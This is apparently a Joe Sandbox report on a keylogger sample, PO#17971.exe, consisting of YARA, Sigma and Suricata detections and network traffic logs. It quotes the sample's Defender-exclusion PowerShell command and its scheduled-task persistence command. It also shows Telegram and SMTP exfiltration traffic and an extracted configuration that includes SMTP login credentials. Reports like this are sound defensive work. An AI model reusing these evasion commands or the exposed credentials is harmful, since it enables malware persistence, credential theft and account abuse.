16.2.vbc.exe.6810f20.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.vbc.exe.6810f20.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.vbc.exe.6810f20.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3385c:$a1: get_encryptedPassword 0x33830:$a2: get_encryptedUsername 0x338f4:$a3: get_timePasswordChanged 0x3380c:$a4: get_passwordField 0x33872:$a5: set_encryptedPassword 0x3363f:$a7: get_logins 0x2ef55:$a10: KeyLoggerEventArgs 0x2ef24:$a11: KeyLoggerEventArgsEventHandler 0x33713:$a13: _encryptedPassword
16.2.vbc.exe.6810f20.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d5ec:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc8f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ceec:$a4: \Orbitum\User Data\Default\Login Data 0x3d8cb:$a5: \Kometa\User Data\Default\Login Data
16.2.vbc.exe.6810f20.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31400:$s1: UnHook 0x3139c:$s2: SetHook 0x313d5:$s3: CallNextHook 0x31364:$s4: _hook
0.2.PO#17971.exe.2d9d95c.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.vbc.exe.6810000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.vbc.exe.6810000.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.vbc.exe.6810000.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.vbc.exe.6810000.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.vbc.exe.6810000.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3637c:$a1: get_encryptedPassword 0x36350:$a2: get_encryptedUsername 0x36414:$a3: get_timePasswordChanged 0x3632c:$a4: get_passwordField 0x36392:$a5: set_encryptedPassword 0x3615f:$a7: get_logins 0x31a75:$a10: KeyLoggerEventArgs 0x31a44:$a11: KeyLoggerEventArgsEventHandler 0x36233:$a13: _encryptedPassword
16.2.vbc.exe.6810000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4010c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f7af:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa0c:$a4: \Orbitum\User Data\Default\Login Data 0x403eb:$a5: \Kometa\User Data\Default\Login Data
16.2.vbc.exe.6810000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f20:$s1: UnHook 0x33ebc:$s2: SetHook 0x33ef5:$s3: CallNextHook 0x33e84:$s4: _hook
9.2.vbc.exe.6ea0d7e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vbc.exe.6ea0d7e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.vbc.exe.6ea0d7e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.vbc.exe.6ea0d7e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3385c:$a1: get_encryptedPassword 0x33830:$a2: get_encryptedUsername 0x338f4:$a3: get_timePasswordChanged 0x3380c:$a4: get_passwordField 0x33872:$a5: set_encryptedPassword 0x3363f:$a7: get_logins 0x2ef55:$a10: KeyLoggerEventArgs 0x2ef24:$a11: KeyLoggerEventArgsEventHandler 0x33713:$a13: _encryptedPassword
9.2.vbc.exe.6ea0d7e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d5ec:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc8f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ceec:$a4: \Orbitum\User Data\Default\Login Data 0x3d8cb:$a5: \Kometa\User Data\Default\Login Data
9.2.vbc.exe.6ea0d7e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31400:$s1: UnHook 0x3139c:$s2: SetHook 0x313d5:$s3: CallNextHook 0x31364:$s4: _hook
9.2.vbc.exe.6ea0d7e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vbc.exe.6ea0d7e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.vbc.exe.6ea0d7e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.vbc.exe.6ea0d7e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.vbc.exe.6ea0d7e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3545c:$a1: get_encryptedPassword 0x35430:$a2: get_encryptedUsername 0x354f4:$a3: get_timePasswordChanged 0x3540c:$a4: get_passwordField 0x35472:$a5: set_encryptedPassword 0x3523f:$a7: get_logins 0x30b55:$a10: KeyLoggerEventArgs 0x30b24:$a11: KeyLoggerEventArgsEventHandler 0x35313:$a13: _encryptedPassword
9.2.vbc.exe.6ea0d7e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f1ec:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e88f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eaec:$a4: \Orbitum\User Data\Default\Login Data 0x3f4cb:$a5: \Kometa\User Data\Default\Login Data
9.2.vbc.exe.6ea0d7e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33000:$s1: UnHook 0x32f9c:$s2: SetHook 0x32fd5:$s3: CallNextHook 0x32f64:$s4: _hook
16.2.vbc.exe.8d70000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.vbc.exe.8d70000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.vbc.exe.8d70000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.vbc.exe.8d70000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.vbc.exe.8d70000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3545c:$a1: get_encryptedPassword 0x35430:$a2: get_encryptedUsername 0x354f4:$a3: get_timePasswordChanged 0x3540c:$a4: get_passwordField 0x35472:$a5: set_encryptedPassword 0x3523f:$a7: get_logins 0x30b55:$a10: KeyLoggerEventArgs 0x30b24:$a11: KeyLoggerEventArgsEventHandler 0x35313:$a13: _encryptedPassword
16.2.vbc.exe.8d70000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f1ec:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e88f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eaec:$a4: \Orbitum\User Data\Default\Login Data 0x3f4cb:$a5: \Kometa\User Data\Default\Login Data
16.2.vbc.exe.8d70000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33000:$s1: UnHook 0x32f9c:$s2: SetHook 0x32fd5:$s3: CallNextHook 0x32f64:$s4: _hook
Click to see the 71 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#17971.exe", ParentImage: C:\Users\user\Desktop\PO#17971.exe, ParentProcessId: 428, ParentProcessName: PO#17971.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe", ProcessId: 6548, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BBF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BBF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe, ParentImage: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe, ParentProcessId: 7252, ParentProcessName: TZRtlifudvO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BBF.tmp", ProcessId: 7520, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Initiated: true, ProcessId: 7192, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49787

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#17971.exe", ParentImage: C:\Users\user\Desktop\PO#17971.exe, ParentProcessId: 428, ParentProcessName: PO#17971.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp", ProcessId: 2716, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#17971.exe", ParentImage: C:\Users\user\Desktop\PO#17971.exe, ParentProcessId: 428, ParentProcessName: PO#17971.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe", ProcessId: 6548, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#17971.exe", ParentImage: C:\Users\user\Desktop\PO#17971.exe, ParentProcessId: 428, ParentProcessName: PO#17971.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp", ProcessId: 2716, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T15:03:42.448660+0100	2803305	3	Unknown Traffic	192.168.2.5	49710	104.21.96.1	443	TCP
2025-01-10T15:03:43.659105+0100	2803305	3	Unknown Traffic	192.168.2.5	49713	104.21.96.1	443	TCP
2025-01-10T15:03:44.841733+0100	2803305	3	Unknown Traffic	192.168.2.5	49716	104.21.96.1	443	TCP
2025-01-10T15:03:46.308259+0100	2803305	3	Unknown Traffic	192.168.2.5	49719	104.21.96.1	443	TCP
2025-01-10T15:03:46.723367+0100	2803305	3	Unknown Traffic	192.168.2.5	49720	104.21.96.1	443	TCP
2025-01-10T15:03:50.759268+0100	2803305	3	Unknown Traffic	192.168.2.5	49731	104.21.96.1	443	TCP
2025-01-10T15:03:50.918520+0100	2803305	3	Unknown Traffic	192.168.2.5	49732	104.21.96.1	443	TCP
2025-01-10T15:03:52.505880+0100	2803305	3	Unknown Traffic	192.168.2.5	49735	104.21.96.1	443	TCP
2025-01-10T15:03:55.788098+0100	2803305	3	Unknown Traffic	192.168.2.5	49747	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T15:03:40.663634+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	158.101.44.242	80	TCP
2025-01-10T15:03:41.941038+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	158.101.44.242	80	TCP
2025-01-10T15:03:43.147982+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49711	158.101.44.242	80	TCP
2025-01-10T15:03:44.450723+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49714	158.101.44.242	80	TCP
2025-01-10T15:03:45.038599+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49715	158.101.44.242	80	TCP
2025-01-10T15:03:46.132348+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49715	158.101.44.242	80	TCP
2025-01-10T15:03:47.351094+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49722	158.101.44.242	80	TCP
2025-01-10T15:03:48.569861+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49726	158.101.44.242	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T15:03:53.430446+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49737	149.154.167.220	443	TCP
2025-01-10T15:03:58.402098+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49756	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "account@igakuin.com", "Password": "aa209bmt", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "account@igakuin.com", "Password": "aa209bmt", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: PO#17971.exe	ReversingLabs: Detection: 42%
Source: PO#17971.exe	Virustotal: Detection: 41%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO#17971.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: PO#17971.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49708 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49718 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49756 version: TLS 1.2

Source: PO#17971.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: _.pdb source: vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4512932633.00000000065B8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PO#17971.exe	Code function: 4x nop then jmp 0724E3FCh	0_2_0724D9F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 0700FB20h	9_2_0700FB6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 0700FB20h	9_2_0700F980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6ADCCh	9_2_09F6AB18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6B516h	9_2_09F6B0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6EBB6h	9_2_09F6E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_09F608B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_09F60A96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F60F50h	9_2_09F60D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F618DAh	9_2_09F60D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6F14Ch	9_2_09F6EEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6E304h	9_2_09F6E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_09F60280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6E75Ch	9_2_09F6E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6DEACh	9_2_09F6DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6B516h	9_2_09F6B0EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6D5FCh	9_2_09F6D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6F5A4h	9_2_09F6F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6B516h	9_2_09F6B444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6DA54h	9_2_09F6D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 09F6F9FCh	9_2_09F6F750
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Code function: 4x nop then jmp 0568D6A4h	10_2_0568CC9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 0642FB20h	16_2_0642FB6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 0642FB20h	16_2_0642F980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_08E508B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5EBB6h	16_2_08E5E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_08E50A96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5ADCCh	16_2_08E5AB18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E50F50h	16_2_08E50D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E518DAh	16_2_08E50D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5F14Ch	16_2_08E5EEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5E304h	16_2_08E5E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_08E50280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5E75Ch	16_2_08E5E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5DEACh	16_2_08E5DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5B516h	16_2_08E5B0EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5B516h	16_2_08E5B0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5F5A4h	16_2_08E5F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5D5FCh	16_2_08E5D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5B516h	16_2_08E5B444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5DA54h	16_2_08E5D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then jmp 08E5F9FCh	16_2_08E5F750

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49756 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49737 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.5:49787 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2010/01/2025%20/%2022:27:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 158.101.44.242:80
